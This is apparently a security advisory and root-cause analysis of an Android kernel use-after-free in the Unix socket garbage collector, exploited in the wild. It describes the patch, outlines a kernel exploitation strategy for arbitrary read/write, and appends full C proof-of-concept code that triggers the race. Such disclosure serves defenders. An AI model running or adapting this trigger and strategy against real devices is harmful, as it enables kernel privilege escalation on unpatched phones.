Xingyu Jin, Android Security Research

The Basics

Disclosure or Patch Date: November 5, 2021

Product: Google Android

Advisory: https://source.android.com/security/bulletin/2021-11-01#kernel-components

Affected Versions: Pre-Nov 5 2021 SPL for devices released prior to Nov 2022

First Patched Version: 5 Nov 2021 SPL+

Issue/Bug Report: A-196926917

Patch CL: https://android.googlesource.com/kernel/common/+/cbcf01128d0a92e131bd09f1688fe032480b65ca

Bug-Introducing CL: Unknown

Reporter(s): Anonymous

The Code

Proof-of-concept: See the appendix

Exploit sample: N/A

Did you have access to the exploit sample when doing the analysis? Yes

The Vulnerability

Bug class: use-after-free (UAF)

Vulnerability details:

There is a race condition in which the Unix socket garbage collector (GC) can treat an inflight socket as a garbage candidate while the file reference count of that socket is being incremented at the same time. This occurs when the recvmsg syscall is called with the MSG_PEEK flag. The unexpected increase in the reference count can alter the internal state of the garbage collector and lead to a use-after-free of an sk_buff object. See this blog post for the full explanation.
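To make the MSG_PEEK behaviour concrete, here is a minimal user-space sketch. It is not taken from the exploit or from the kernel source. It illustrates that, on Linux, peeking at a message that carries SCM_RIGHTS installs a fresh descriptor for the same open file on every peek, which is where the extra file reference comes from. The names send_one_fd, recv_one_fd, same_file, and peek_installs_new_fds are hypothetical helpers introduced only for this illustration.

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/uio.h>
#include <unistd.h>

/* Properly aligned control buffer for exactly one descriptor. */
union fd_ctl {
  char buf[CMSG_SPACE(sizeof(int))];
  struct cmsghdr align;
};

/* Hypothetical helper: send one descriptor as SCM_RIGHTS ancillary data. */
static int send_one_fd(int sock, int fd) {
  char byte = 'x';
  struct iovec io = {.iov_base = &byte, .iov_len = 1};
  union fd_ctl ctl;
  struct msghdr msg;

  memset(&ctl, 0, sizeof(ctl));
  memset(&msg, 0, sizeof(msg));
  msg.msg_iov = &io;
  msg.msg_iovlen = 1;
  msg.msg_control = ctl.buf;
  msg.msg_controllen = sizeof(ctl.buf);
  struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
  cmsg->cmsg_level = SOL_SOCKET;
  cmsg->cmsg_type = SCM_RIGHTS;
  cmsg->cmsg_len = CMSG_LEN(sizeof(int));
  memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));
  return sendmsg(sock, &msg, 0) < 0 ? -1 : 0;
}

/* Hypothetical helper: receive one descriptor; flags may include MSG_PEEK. */
static int recv_one_fd(int sock, int flags) {
  char byte;
  struct iovec io = {.iov_base = &byte, .iov_len = 1};
  union fd_ctl ctl;
  struct msghdr msg;
  int fd = -1;

  memset(&ctl, 0, sizeof(ctl));
  memset(&msg, 0, sizeof(msg));
  msg.msg_iov = &io;
  msg.msg_iovlen = 1;
  msg.msg_control = ctl.buf;
  msg.msg_controllen = sizeof(ctl.buf);
  if (recvmsg(sock, &msg, flags) < 0) return -1;
  struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
  if (cmsg == NULL || cmsg->cmsg_level != SOL_SOCKET ||
      cmsg->cmsg_type != SCM_RIGHTS)
    return -1;
  memcpy(&fd, CMSG_DATA(cmsg), sizeof(int));
  return fd;
}

/* Two descriptors refer to the same file if device and inode match. */
static int same_file(int a, int b) {
  struct stat sa, sb;
  if (fstat(a, &sa) != 0 || fstat(b, &sb) != 0) return 0;
  return sa.st_dev == sb.st_dev && sa.st_ino == sb.st_ino;
}

/* Returns 1 if two peeks and one normal receive each yield a distinct
 * descriptor for the same pipe, 0 if not, -1 on setup failure. */
int peek_installs_new_fds(void) {
  int sv[2], p[2];
  if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0) return -1;
  if (pipe(p) != 0) return -1;
  if (send_one_fd(sv[0], p[0]) != 0) return -1;

  int a = recv_one_fd(sv[1], MSG_PEEK); /* message stays queued */
  int b = recv_one_fd(sv[1], MSG_PEEK); /* same message, another fd */
  int c = recv_one_fd(sv[1], 0);        /* finally dequeues the message */

  int ok = a >= 0 && b >= 0 && c >= 0 && a != b && b != c && a != c &&
           same_file(a, p[0]) && same_file(b, p[0]) && same_file(c, p[0]);

  if (a >= 0) close(a);
  if (b >= 0) close(b);
  if (c >= 0) close(c);
  close(p[0]); close(p[1]); close(sv[0]); close(sv[1]);
  return ok;
}
```

Each peek leaves the message, and the file reference it holds, in the receive queue while handing an additional reference to the receiver. The sketch only demonstrates this duplication; it does not race against the GC.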

Patch analysis:

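The patch forces a recvmsg syscall with the MSG_PEEK flag to synchronize with the GC: the peek path takes and immediately releases unix_gc_lock, so it waits for any in-progress GC run to finish. As a result, it is impossible for the receiver to obtain a file descriptor with an elevated reference count.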

+       spin_lock(&unix_gc_lock);
+       spin_unlock(&unix_gc_lock);
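The lock-then-unlock pair protects no data; it acts purely as a barrier. The following user-space sketch illustrates the idea with pthreads. It is an analogy under stated assumptions, not the kernel code: gc_lock stands in for unix_gc_lock, refcount for the file reference count, and all names (peeker, barrier_waits_for_gc, gc_running) are hypothetical.

```c
#include <pthread.h>
#include <unistd.h>

static pthread_mutex_t gc_lock = PTHREAD_MUTEX_INITIALIZER; /* ~ unix_gc_lock */
static int gc_running;           /* written only while gc_lock is held */
static int refcount = 1;         /* ~ file reference count */
static int seen_gc_running = -1; /* what the peeker observed after the barrier */

/* Peek path: take the extra reference, then wait out any in-progress GC. */
static void *peeker(void *unused) {
  (void)unused;
  refcount++;                     /* ~ duplicating the fd list on MSG_PEEK */
  pthread_mutex_lock(&gc_lock);   /* blocks while the "GC" holds the lock */
  pthread_mutex_unlock(&gc_lock); /* nothing to protect: pure synchronization */
  seen_gc_running = gc_running;   /* the "GC" has finished by this point */
  return NULL;
}

/* Simulates a GC run that overlaps with a peek.
 * Returns the gc_running value seen by the peeker, or -1 on error. */
int barrier_waits_for_gc(void) {
  pthread_t t;

  pthread_mutex_lock(&gc_lock);
  gc_running = 1;
  if (pthread_create(&t, NULL, peeker, NULL) != 0) {
    gc_running = 0;
    pthread_mutex_unlock(&gc_lock);
    return -1;
  }
  usleep(50 * 1000); /* pretend to scan garbage candidates */
  gc_running = 0;
  pthread_mutex_unlock(&gc_lock);
  pthread_join(t, NULL);
  return seen_gc_running;
}
```

The peeker cannot get past the barrier until the simulated GC releases the lock, so it never continues with its new reference while a scan is still under way.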

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.): “fuzzing”: the bug was found in 2016 by a developer who heavily used SCM_RIGHTS + MSG_PEEK.

(Historical/present/future) context of bug: The bug was found in 2016 according to the public Linux kernel email thread, but the patch was not accepted.

The Exploit

(The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.)

Exploit strategy (or strategies):

The sk_buff->data of the use-after-free sk_buff object may be reoccupied by a scm_fp_list object, which leaks a set of file structure pointers. Since several file structures may occupy an entire newly allocated slab page, the exploit can learn the page address and control the page content by freeing the corresponding file descriptors and spraying slab pages. The exploit may place several fake pipe structures on a controlled slab page and link them up with a file through skb_unlink. pipe_buffer->page and pipe_buffer->offset can then be abused to implement arbitrary read/write primitives.

Exploit flow:

The vulnerable GC may be tricked by a convoluted file descriptor transmission scenario in which two threads use the recvmsg syscall to retrieve the transmitted file descriptors at the same time. After the GC completes, a thread may receive a use-after-free sk_buff object. In the meantime, several additional threads need to perform the heap spray, fix up kernel structures, and manipulate the kernel scheduler. To prolong the GC run and so win the race, an exploit may intentionally create a large number of garbage objects.

Known cases of the same exploit flow:

No

Part of an exploit chain?

Yes, this is part of an in-the-wild Samsung full-chain exploit. The RCE part of the chain is the Samsung browser in-the-wild 0-day CVE-2021-38000 and the Chrome n-day CVE-2020-16040.

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why): Code auditing, because the GC implementation is too complex for a fuzzer to easily spot security bugs.

Found variants: CVE-2021-4083 by Jann Horn

Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

Ideas to kill the bug class: Have a formal model of the file lifecycle and the GC, or a specialized race fuzzer for fuzzing GC.

Ideas to mitigate the exploit flow: CONFIG_SLAB_FREELIST_RANDOM should be a required mitigation for Android to reduce the possibility of heap shaping.

Other potential improvements: Documenting the precise semantics of the lifecycle states and reference states of complicated kernel structures (e.g. struct file).

0-day detection methods

What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day?

Potential signal: a program generates a large number of garbage objects while other suspicious threads pin themselves to different CPU cores and tweak task affinity.
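As a rough illustration of the affinity part of this signal, the sketch below counts how many threads of a process are restricted to a single CPU by reading the Cpus_allowed_list field from /proc/<pid>/task/<tid>/status on Linux. The function names is_single_cpu_list and count_pinned_threads are hypothetical, and this is only one possible heuristic, not an established detection method.

```c
#include <dirent.h>
#include <stdio.h>
#include <string.h>

/* Returns 1 if a Cpus_allowed_list value such as "3" names exactly one CPU,
 * 0 for ranges or lists such as "0-7" or "0,2". */
int is_single_cpu_list(const char *list) {
  if (list[0] < '0' || list[0] > '9') return 0;
  return strpbrk(list, ",-") == NULL;
}

/* Counts the threads of a process that are pinned to a single CPU.
 * pid_dir is the /proc entry name, e.g. "self" or "1234".
 * Returns -1 if the task directory cannot be opened. */
int count_pinned_threads(const char *pid_dir) {
  char path[512];
  snprintf(path, sizeof(path), "/proc/%s/task", pid_dir);
  DIR *d = opendir(path);
  if (d == NULL) return -1;

  int pinned = 0;
  struct dirent *e;
  while ((e = readdir(d)) != NULL) {
    if (e->d_name[0] < '0' || e->d_name[0] > '9') continue; /* skip . and .. */
    snprintf(path, sizeof(path), "/proc/%s/task/%s/status", pid_dir,
             e->d_name);
    FILE *f = fopen(path, "r");
    if (f == NULL) continue; /* the thread may have exited meanwhile */
    char line[256];
    while (fgets(line, sizeof(line), f) != NULL) {
      if (strncmp(line, "Cpus_allowed_list:", 18) == 0) {
        char *value = line + 18;
        value += strspn(value, " \t");     /* skip separator whitespace */
        value[strcspn(value, "\n")] = '\0'; /* strip trailing newline */
        pinned += is_single_cpu_list(value);
        break;
      }
    }
    fclose(f);
  }
  closedir(d);
  return pinned;
}
```

On a single-CPU system every thread looks pinned, so a real detector would need to combine this count with other signals, such as the volume of inflight Unix sockets and priority changes.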

Other References

Appendix

// aarch64-linux-gnu-gcc-10 poc.c -o poc -static -lpthread
#define _GNU_SOURCE /* See feature_test_macros(7) */
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
 
#define __int64 long
#define __int8 char
 
int sv[2];
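pthread_mutex_t condition_mutex_recvmsg = PTHREAD_MUTEX_INITIALIZER;
pthread_mutex_t condition_mutex_recv = PTHREAD_MUTEX_INITIALIZER;
int g_victim_sock_fd;
pthread_mutex_t condition_mutex_gc = PTHREAD_MUTEX_INITIALIZER;
pthread_cond_t condition_cond_gc = PTHREAD_COND_INITIALIZER;
pthread_cond_t condition_cond_recvmsg = PTHREAD_COND_INITIALIZER;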
 
// helpers
static void send_fd(int socket, int fd)  // send fd by socket
{
  struct msghdr msg = {0};
  char buf[CMSG_SPACE(sizeof(fd))];
  memset(buf, '\0', sizeof(buf));
  struct iovec io = {.iov_base = "", .iov_len = 1};
  msg.msg_iov = &io;
  msg.msg_iovlen = 1;
  msg.msg_control = buf;
  msg.msg_controllen = sizeof(buf);
  struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
  cmsg->cmsg_level = SOL_SOCKET;
  cmsg->cmsg_type = SCM_RIGHTS;
  cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
  *((int *)CMSG_DATA(cmsg)) = fd;
  msg.msg_controllen = CMSG_SPACE(sizeof(fd));
  if (sendmsg(socket, &msg, 0) < 0) perror("Failed to send message send_fd");
}
 
static void send_fds(int socket, int *fds, int num_fds, int num_iovs) {
  struct msghdr msg = {0};
  char buf[CMSG_SPACE(num_fds * sizeof(int))];
  memset(buf, '\0', sizeof(buf));
  struct iovec io[num_iovs];
  for (int i = 0; i < num_iovs; i++) {
    io[i].iov_base = "A";
    io[i].iov_len = 2;
  }
  msg.msg_iov = io;
  msg.msg_iovlen = num_iovs;
  msg.msg_control = buf;
  msg.msg_controllen = sizeof(buf);
  struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
  cmsg->cmsg_level = SOL_SOCKET;
  cmsg->cmsg_type = SCM_RIGHTS;
  cmsg->cmsg_len = CMSG_LEN(num_fds * sizeof(int));
  memcpy(CMSG_DATA(cmsg), fds, num_fds * sizeof(int));
  if (sendmsg(socket, &msg, 0) < 0) perror("Failed to send message send_fds");
}
 
__int64 pin_cpu(int core_id) {
  cpu_set_t mask;
  CPU_ZERO(&mask);
  CPU_SET(core_id, &mask);
  return sched_setaffinity(0, sizeof(mask), &mask);
}
 
// thread to trigger unix_gc()
void *t_main_gc_simple(void *unused) {
  int v3;
  int fd;

  (void)unused;
  setpriority(PRIO_PROCESS, 0, -19);
  pin_cpu(3);
  // Wait for setup_race() to signal condition_cond_gc.
  pthread_mutex_lock(&condition_mutex_gc);
  pthread_cond_wait(&condition_cond_gc, &condition_mutex_gc);
  pthread_mutex_unlock(&condition_mutex_gc);
  fd = socket(1, 1, 0);  // AF_LOCAL, SOCK_STREAM
  v3 = socket(1, 1, 0);
  setpriority(PRIO_PROCESS, 0, -18);
  close(fd);
  // Wake the receiver thread, then close the second socket.
  pthread_cond_signal(&condition_cond_recvmsg);
  close(v3);
  usleep(0x186A0u);  // 100 ms
  return NULL;
}
 
int fd_34[2];
int local_spair[2];
 
__int64 setup_race(int a1) {
  int v5[710];  // [10..509]: garbage sockets, [510..709]: socket pairs
  int fd;

  setpriority(PRIO_PROCESS, 0, 19);
  fd = socket(1, 1, 0);  // AF_LOCAL, SOCK_STREAM
  close(fd);
  usleep(0x61A80u);  // 400 ms
  socketpair(1, 1, 0, fd_34);
  send_fd(sv[0], fd_34[1]);
  send_fd(fd_34[0], fd_34[0]);
  for (int i = 0; i <= 99; ++i) {
    socketpair(1, 1, 0, &v5[2 * i + 510]);
    for (int k = 0; k <= 4; ++k) v5[5 * i + 10 + k] = socket(1, 1, 0);
  }
  for (int i = 0; i <= 99; ++i) {
    send_fd(fd_34[1], v5[2 * i + 511]);
    for (int k = 0; k <= 4; ++k) {
      send_fd(v5[2 * i + 510], v5[5 * i + 10 + k]);
      close(v5[5 * i + 10 + k]);
    }
    close(v5[2 * i + 511]);
    close(v5[2 * i + 510]);
  }
  close(fd_34[1]);
  close(fd_34[0]);
  usleep(0x186A0u);
  pthread_cond_signal(&condition_cond_gc);
  usleep(0x186A0u);
  close(sv[0]);
  return 0;
}
 
__int64 t_recvmsg() {
  int v0;
  int v1;
  int *v2;
  int v4;
  int v5;
  __int64 v6;
  int v7;
  cpu_set_t v8;
  char v9;
  long v10[130];
  struct msghdr v11;
  long received_fds[10];
  int fd;
  int v14;
  int *received_fds_ptr;
  int v16;
  int v17;
 
  setpriority(PRIO_PROCESS, 0, 20);
  v9 = 0;
  memset(&v11, 0, sizeof(v11));
  v10[0] = (long)&v9;  // iov_base
  v10[1] = 1LL;        // iov_len
  v11.msg_iov = (struct iovec *)v10;
  v11.msg_iovlen = 1LL;
  v11.msg_control = received_fds;
  v11.msg_controllen = 20LL;
  received_fds_ptr = (int *)received_fds;
  received_fds[0] = 20LL;  // len
  v17 = 0;
  v14 = -1;
  pin_cpu(2LL);
  setpriority(PRIO_PROCESS, 0, -19);
  pthread_mutex_lock(&condition_mutex_recvmsg);
  pthread_cond_wait(&condition_cond_recvmsg, &condition_mutex_recvmsg);
  pthread_mutex_unlock(&condition_mutex_recvmsg);
  usleep(0xFAu);
  v0 = recvmsg(sv[1], &v11, 0x80042);  // low bits 0x42: MSG_PEEK | MSG_DONTWAIT
  v14 = v0 < 0;
  fd = received_fds_ptr[4];
  v1 = recvmsg(fd, &v11, 0x80042);  // data
  v14 = v1 < 0;
  g_victim_sock_fd = received_fds_ptr[4];
  usleep(0x3E8u);
  v17 = 0;
  v16 = -1;
  v7 = recvmsg(fd, &v11, 0x80040);  // low bits 0x40: MSG_DONTWAIT, no MSG_PEEK
  v14 = v7 < 0;
  v16 = received_fds_ptr[4];
  usleep(0x186A0u);
  close(fd);
  close(v16);
  close(sv[1]);
  pthread_exit(0LL);
  return 0LL;
}
 
void trigger() {
  pthread_t v18;
  pthread_t v20;
  pthread_t v21;
  void *arg;
  pthread_create(&v20, 0LL, (void *(*)(void *))t_main_gc_simple, 0LL);
  pthread_create(&v18, 0LL, (void *(*)(void *))t_recvmsg, 0LL);
  usleep(0x2710u);
  pthread_create(&v21, 0LL, (void *(*)(void *))setup_race, 0LL);
  pthread_join(v21, 0LL);
  pthread_join(v18, 0LL);
  pthread_join(v20, 0LL);
  usleep(10);
  puts("wut?");
}
 
int main(int argc, char **argv) {
  for (int i = 0; i < 20; i++) {
    if (socketpair(1, 1, 0, sv) != 0)
      printf("Failed to create Unix-domain socket pair\n");
    trigger();
  }
  return 0;
}